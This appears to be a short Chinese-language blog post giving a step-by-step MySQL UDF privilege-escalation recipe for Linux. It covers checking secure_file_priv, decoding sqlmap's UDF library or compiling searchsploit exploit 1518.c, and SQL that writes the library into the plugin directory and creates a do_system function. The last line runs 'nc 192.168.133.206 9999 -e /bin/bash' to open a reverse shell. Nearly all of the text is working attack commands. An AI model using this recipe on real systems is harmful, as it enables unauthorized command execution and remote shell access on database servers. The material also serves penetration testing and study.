MYSQL提权(LINUX)

select @@global.secure_file_priv;
查看MySQL服务器的文件读写权限
如果是NULL就是完全禁止

udf提权用到的so文件(linux)在kali下默认集成,路径为/usr/share/sqlmap/udf/mysql/linux/64(32)

  • 还有一个需要注意的是,sqlmap里的udf.dll是通过异或编码的,使用之前一定要记得解码,解码的工具也在sqlmap中,路径为/usr/share/sqlmap/extra/cloak解密之后会在so目录下生成so文件

  • 需要创建udf中存在的函数才可以,可以用十六进制编辑器打开udf.so看一下

图片.png

或者searchsploit mysql udf

图片.png

把对应的内容编译出来

gcc -g -c 1518.c
gcc -g -shared -o  1518.so 1518.o -lc

mysql创建函数命令

use mysql;
show variables like '%plugin%';
create table udf1(line blob);
insert into udf1 values(load_file('/tmp/udf.so'));
select * from udf1 into dumpfile '/usr/lib/mysql/plugin/udf.so';
create function do_system returns integer soname 'udf.so';
select * from mysql.func; #查询是否创建函数成功
select do_system('nc 192.168.133.206 9999 -e /bin/bash');

你可能感兴趣的:(MYSQL提权(LINUX))